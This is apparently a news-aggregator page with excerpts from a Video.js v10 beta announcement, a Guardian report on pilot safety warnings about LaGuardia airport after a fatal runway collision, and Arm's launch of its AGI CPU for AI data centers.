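// An agent like Claude Code sends accept: text/markdown ...
const forAgent = negotiate('text/markdown, text/plain;q=0.8', page);
// ... while a browser asks for HTML.
const forBrowser = negotiate('text/html,application/xhtml+xml', page);
```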
In writing this part and getting input from the team I found we actually have a lot to say about our experience building with AI and the many ways we put it to use, so keep an eye out for a followup post on that topic.
A few things to know:
* The APIs are not quite stable. This is a beta, so some interfaces will change before GA. Build with it, experiment, give us feedback, put it on simple projects. It’s not yet time for a major migration.
* The features may be limited. You might be surprised by which features aren’t supported yet and also by which already are. We are building from a base of four existing players, but our goal for reaching beta was simple website playback functionality. It’s accessible and supports captions, and already works with many formats and streaming services, but things like settings menus are still on their way.
* We really want your feedback. File issues on GitHub, join the conversation on Discord, tell us what works and what doesn’t. In general, people seem to engage less with JS “widgets” like a video player than with JS frameworks, so please don’t be shy. Your input is really valuable.
If you’re starting something new, this is a good time to try v10. Go to videojs.org and check out the installation guide.
If you’re running a previous version in production, sit tight. We’ll have migration guides before we ask you to move.
We’re aiming for mid-2026 for GA. Between now and then:
* Feature parity with the capabilities developers rely on in the previous version, Plyr, Vidstack and Media Chrome.
* Planning ads support later in 2026. Ads are complicated.
* More player presets for common use cases
@cpilsbury, @decepulis, @esbie, @luwes, @mihar-22, @sampotts for building the thing — who needs AI when you have the absolute best team of people in the world. I’m aware that makes no sense.
That said, @claude. I don’t know if you can hear this yet, but we certainly burned through some tokens together.
@dhassoun, @essk, @ewelch-mux, @gesinger, @gkatsev, @kixelated, @littlespex, @mister-ben, @misteroneill for being the best advisors and internal champions a project could hope for.
My company @muxinc for stepping in to make sure Video.js still has breath and allowing many of us to spend all our time on it. And @brightcove for keeping it breathing for so many years before. Our friends at @qualabs for carrying the load of other projects and giving us time to focus.
I’m very excited for you to fall back in love with your video player ❤️ (This is a theme we’re doing. We have cool stickers.)
...
Read the original on videojs.org »
...
Read the original on www.answer.ai »
Pilot safety concerns about New York’s LaGuardia airport were filed to aviation officials months before Sunday’s collision between an airplane and a fire truck left two pilots dead and 41 other people hospitalized.
According to the aviation safety reporting system administered by the US space agency Nasa, a pilot using the airport in the summer wrote, “Please do something,” after air traffic controllers failed to provide appropriate guidance about multiple nearby aircraft.
“The pace of operations is building in LGA,” they wrote, referring to the New York City airport, one of the busiest in the US. “The controllers are pushing the line.”
In a reference to the January 2025 mid-air collision over the Potomac River in Washington DC that killed more than 60 people, they said: “On thunderstorm days, LGA is starting to feel like [Ronald Reagan National airport] did before the accident there.”
The warning, first reported by CNN, showed that the pilot was concerned that LaGuardia’s control tower had issued a takeoff clearance for an aircraft when their plane was “only 300 feet high on final” approach on a different runway — and the departing plane had hesitated before initiating its takeoff run.
“I think he or she thought twice before starting their takeoff roll,” the pilot of the aircraft said. The pilot said that thick, smoky haze from wildfires in Canada at the time, as well as a possible helicopter in the area, had convinced him it was “safer to continue the approach and land [about] 10 seconds after the departing aircraft crossed our path”.
Otherwise, the pilot added, he would have been left “suddenly going around and trusting that the helicopter was not near the departure end of 22”, with the number referring to a runway.
The pilot concluded: “the [air traffic control] guidance … does not seem to give guidance on exactly how close aircraft in this situation can get.”
“Based on today’s and close calls I have seen over the years for [runways at the Philadelphia and Newark international airports], it seems to be a [judgment] call by the local controller.”
They also said that a runway lighting system had been turned off. In another report since January 2025, a pilot said their aircraft had been cleared to cross a runway — but while crossing, “we noticed an aircraft we thought was landing at [runway] 31C seemingly headed for us.”
Air traffic control “should have sent the aircraft around”, they said.
Nasa’s Aviation Safety Reporting System has received dozens of anonymous pilot complaints about safety concerns at the smallest of New York’s three local airports.
The reports come as investigators look into Sunday’s collision between landing Air Canada Express flight 646 from Montreal and an airport fire truck that had been cleared to cross the runway, which led to the deaths of pilots MacKenzie Gunther and Antoine Forest and injured dozens more.
After the air traffic controller cleared the fire truck, which was responding to a plane that had reported difficulties, the controller then tried to stop it from crossing. He could later be heard saying on a recording that he had been “dealing with an emergency earlier” and that he “messed up”.
The crash has raised fears that operations at US airports are under extreme stress. Airports have been dealing with a shortage of air traffic controllers, exacerbated by brutal federal government personnel cuts by Donald Trump’s administration at the start of his second presidency.
Airports have also grappled with ageing equipment and a shortage of security screeners owing to a partial government shutdown since mid-February, which has caused long security lines and frustration among travelers. More than 450 TSA officers have quit during the partial government shutdown, the Department of Homeland Security said on Tuesday.
“We did not need another aviation tragedy to see this coming,” said aviation expert Brian Fielkow in a comment to the Guardian. An investigation into the collision will take time, he warned, but “let’s stop pretending we don’t understand the conditions in which this is happening.
“We are watching a system under strain. TSA professionals are showing up to work without pay. This creates distraction, instability and unnecessary risk. We are asking people responsible for securing our transportation system to operate under financial and emotional strain and expecting flawless performance. We are managing aviation safety like a political pawn instead of a system that cannot fail.”
Federal investigators said late on Monday it was too soon to answer many questions about Sunday’s deadly accident but promised more information would be released Tuesday.
Jennifer Homendy, the National Transportation Safety Board (NTSB) chair whose agency is investigating Sunday’s crash, said investigators would analyze the involved airplane’s cockpit and flight data recorders, which were recovered from the wreck undamaged.
She said the runway where the crash happened was likely to be closed for days as investigators sift through a “tremendous amount of debris”.
Homendy also said that an NTSB investigator sent to LaGuardia on Monday was delayed for three hours by security lines in Houston.
“Our air traffic control specialist, who was in line … for three hours, until we called … to beg, to see if we can get her through, so we can get her here.
“So it’s been a really big challenge to get the entire team here, and they’re still arriving as we speak,” Homendy added.
The Trump administration has sent Immigration and Customs Enforcement (ICE) agents to many US airports, claiming they are there to help with long pre-security lines.
Adam Stahl, the acting TSA deputy administrator, told Fox News that ICE agents would be “conducting non-specialized security support — manning the exit lanes, crowd management, line control … to help alleviate the challenges that our officers are facing”.
Hundreds of Transportation Security Administration (TSA) agents have called in sick or quit their jobs rather than be forced to work without pay amid the shutdown. The shutdown stems from the US Senate declining to fund the TSA’s parent agency amid a disagreement over immigration enforcement reforms.
Sean Duffy, the US transportation secretary, on Monday declined to say how many controllers were on duty at LaGuardia when Sunday’s crash happened, deferring instead to the ongoing NTSB investigation.
But he denied rumors that the tower had only one controller on duty. He said LaGuardia was “very well staffed”, with 33 certified controllers and more in training. He said the goal was to have 37 on staff.
Sunday’s incident was not the only collision at LaGuardia in recent months. In October, two Delta jets collided on a taxiway, sending one person to a hospital.
In July 2024, a co-pilot reported a similar near-collision after controllers said a plane was cleared to cross the runway even though another aircraft was landing at the same time.
“Ground control issued a stop command just in time,” the report entry said.
...
Read the original on www.theguardian.com »
...
Read the original on www.githubstatus.com »
Today, Arm is announcing the Arm AGI CPU, a new class of production-ready silicon built on the Arm Neoverse platform and designed to power the next generation of AI infrastructure.
For the first time in our more than 35-year history, Arm is delivering its own silicon products — extending the Arm Neoverse platform beyond IP and Arm Compute Subsystems (CSS) to give customers greater choice in how they deploy Arm compute — from building custom silicon to integrating platform-level solutions or deploying Arm-designed processors. It reflects both the rapid evolution of AI infrastructure and growing demand from the ecosystem for production-ready Arm platforms that can be deployed at pace and scale.
AI systems are increasingly operating continuously at global scale. Historically, the human was the bottleneck in computing — the pace at which people could interact with systems defined how quickly work could move through them. In the era of agentic AI, that constraint disappears as software agents coordinate tasks, interact with multiple models and make decisions in real time.
As AI systems run continuously and workloads grow in complexity, the CPU becomes the pacing element of modern infrastructure — responsible for keeping distributed AI systems operating efficiently at scale. In a modern-day AI data center, the CPU manages thousands of distributed tasks — orchestrating accelerators, managing memory and storage, scheduling workloads and moving data across systems — and now, with agentic AI, coordinating fan-out across large numbers of agents.
This shift places new demands on the CPU and that requires an evolution of the processor.
Arm Neoverse already underpins many of today’s leading hyperscale and AI platforms, including AWS Graviton, Google Axion, Microsoft Azure Cobalt and NVIDIA Vera. As AI infrastructure scales globally, partners across the ecosystem are asking Arm to do more. The Arm AGI CPU was created to address this shift.
Agentic AI workloads demand sustained performance at massive scale. The Arm AGI CPU is designed to deliver high per-task performance at sustained load across thousands of cores in parallel — all within the power and cooling limits of modern data centers.
Every element of the Arm AGI CPU — from operating frequency to memory and I/O architecture — has been designed to support massively parallel, high-performance agentic workloads in a densely populated rack deployment.
Arm’s reference server configuration is a 1OU, 2-node design — packing in two chips with dedicated memory and I/O for a total of 272 cores per blade. These blades are designed to fully populate a standard air-cooled 36kW rack — 30 blades delivering a total of 8160 cores. Arm has additionally partnered with Supermicro on a liquid-cooled 200kW design capable of housing 336 Arm AGI CPUs for over 45,000 cores.
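The quoted core counts follow directly from the blade arithmetic; a quick check using the figures above:

```javascript
// Rack core counts implied by the configurations described above.
const coresPerChip = 136;                    // 272 cores per 2-chip blade
const coresPerBlade = 2 * coresPerChip;      // 272 cores per 1OU blade
const airCooledRack = 30 * coresPerBlade;    // 30 blades in a 36kW rack -> 8160 cores
const liquidCooledRack = 336 * coresPerChip; // 336 CPUs in a 200kW rack -> 45,696 cores
```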
In this configuration, the Arm AGI CPU is capable of delivering more than 2x the performance per rack compared to the latest x86 systems*, achieved through the fundamental advantages of the Arm architecture and careful matching of system resources to compute:
* Arm AGI CPU’s class-leading memory bandwidth means more effective threads of execution per rack; x86 CPUs degrade as cores contend under sustained load.
* High performance, efficient, single-threaded Arm Neoverse V3 CPU cores outperform legacy architectures; every Arm thread does more work.
* More usable threads and more work per thread compound into massive performance gains per rack.
The Arm AGI CPU is already seeing strong commercial momentum with partners at the forefront of scaling agentic AI infrastructure. Planned deployments span accelerator management, agentic orchestration and the densification of services, applications and tools needed for agentic task scale-out — as well as increased networking and data plane compute to support the AI data center.
Meta is our lead partner and customer, co-developing the Arm AGI CPU to optimize gigawatt-scale infrastructure for its Meta family of apps and to work alongside Meta’s own custom MTIA accelerators. Other launch partners include Cerebras, Cloudflare, F5, OpenAI, Positron, Rebellions, SAP, and SK Telecom — each working with Arm on the deployment of the Arm AGI CPU to accelerate AI-driven services across cloud, networking and enterprise environments. Commercial systems are now available for order from ASRockRack, Lenovo and Supermicro.
To accelerate adoption further, Arm is introducing the Arm AGI CPU 1OU Dual Node Reference Server, an Open Compute Project (OCP) DC-MHS standard form factor server. Arm plans to contribute this reference server design and supporting firmware, along with further contributions including system architecture specifications, debug frameworks and diagnostic and verification tooling applicable to all Arm-based systems. Further details will come at the upcoming OCP EMEA Summit.
The launch of Arm AGI CPU represents a new chapter in Arm’s data center journey and continued leadership in computing innovation. As AI reshapes the industry, Arm remains committed to enabling progress across the ecosystem — meeting customers where they are, from hyperscale cloud providers to AI startups.
The Arm AGI CPU is the first offering of Arm’s new data center silicon product line and is available to order now. Follow-on products are committed, targeting best-in-class performance, scale and efficiency. This continues in parallel with the Arm Neoverse CSS product roadmap so that all Arm data center customers move forward together on platform architecture and software compatibility.
Entering this new chapter, our mission remains unchanged: to provide the compute foundation that enables innovation across industries. And the ecosystem is fully behind us: More than 50 leading companies across hyperscale, cloud, silicon, memory, networking, software, system design and manufacturing are supporting the expansion of the Arm compute platform into silicon. With Arm AGI CPU, we are not only defining the architecture of the AI-native data center, we are building it.
Hear more from our Arm AGI CPU deployment partners:
“At Cerebras we build AI infrastructure designed for ultra-fast, large-scale inference, and as this becomes the dominant workload in AI, composable, high-performance systems matter more than ever — these systems need purpose-built AI acceleration alongside efficient, scalable CPUs orchestrating data movement, networking, and coordination at scale. Extending the Arm compute platform into AGI-class infrastructure is a positive step for the ecosystem and for customers deploying AI at global scale.” — Andrew Feldman, CEO, Cerebras
“To continue our mission of helping build a better Internet, Cloudflare needs infrastructure that scales efficiently across our global network. The Arm AGI CPU provides high-performance, energy-efficient compute designed for the next generation of workloads.” — Stephanie Cohen, Chief Strategy Officer, Cloudflare
“Delivering AI experiences at global scale demands a robust and adaptable portfolio of custom silicon solutions, purpose-built to accelerate AI workloads and optimize performance across Meta’s platforms. We worked alongside Arm to develop the Arm AGI CPU to deploy an efficient compute platform that significantly improves our data center performance density and supports a multi-generation roadmap for our evolving AI systems.” — Santosh Janardhan, Head of Infrastructure, Meta
“OpenAI runs AI systems at massive scale. Hundreds of millions use ChatGPT every day, businesses build on our API, and developers rely on tools like Codex. The Arm AGI CPU will play an important role in our infrastructure as we scale, strengthening the orchestration layer that coordinates large scale AI workloads and improving efficiency, performance, and bandwidth across the system.” — Sachin Katti, Head of Industrial Compute at OpenAI
“At Positron, we are focused on purpose-built inference accelerators that deliver breakthrough token generation efficiency using commodity memory. Arm has consistently delivered the industry’s most power-efficient compute platforms, which makes the Arm AGI CPU a natural foundation for next-generation AI infrastructure. By combining Positron’s inference acceleration technology with the energy-efficient Arm AGI CPU platform, we see a powerful opportunity to help data center operators deploy frontier AI models at scale with greater performance per watt and per dollar.” — Mitesh Agrawal, CEO, Positron AI
“High-performance AI systems require tight coordination between general-purpose compute and accelerator architectures. By combining the Arm AGI CPU with Rebellions’ NPUs in new high-density server configurations — we’re delivering a scalable, energy efficient platform that is optimized for AI inference workloads at scale.” — Marshall Choy, Chief Business Officer, Rebellions
“SAP’s successful deployment of SAP HANA on Arm-based AWS Graviton underscores the maturity and performance of the Arm ecosystem for enterprise workloads. The Arm AGI CPU extends that opportunity, providing scalable, efficient compute designed to support the next generation of AI-powered business solutions.” — Stefan Bäuerle, Senior Vice President, Head of HANA & Persistency, SAP
“SK Telecom is expanding into large-scale, full-stack AI inference data center infrastructure, which includes Arm AGI CPU and Rebellions AI accelerator chip. By bringing together our sovereign A. X foundation model with inference-optimized AI servers, we are ready to deliver it to the world while elevating our AIDC competitiveness.” — Suk-geun (SG) Chung, CTO and Head of AI CIC, SK Telecom
This blog post contains forward-looking statements regarding Arm’s product roadmap, future performance, planned contributions and partner deployments. These statements are based on current expectations and are subject to risks and uncertainties that could cause actual results to differ materially. For a discussion of factors that could affect Arm’s results, please refer to Arm’s filings with the U. S. Securities and Exchange Commission.
Performance claims are based on Arm internal estimates comparing a fully populated rack of Arm AGI CPU-based servers against comparable x86-based server configurations using industry-standard workloads. Actual results may vary based on system configuration, workload, and other factors.
All product and company names are trademarks or registered trademarks of their respective holders.
...
Read the original on newsroom.arm.com »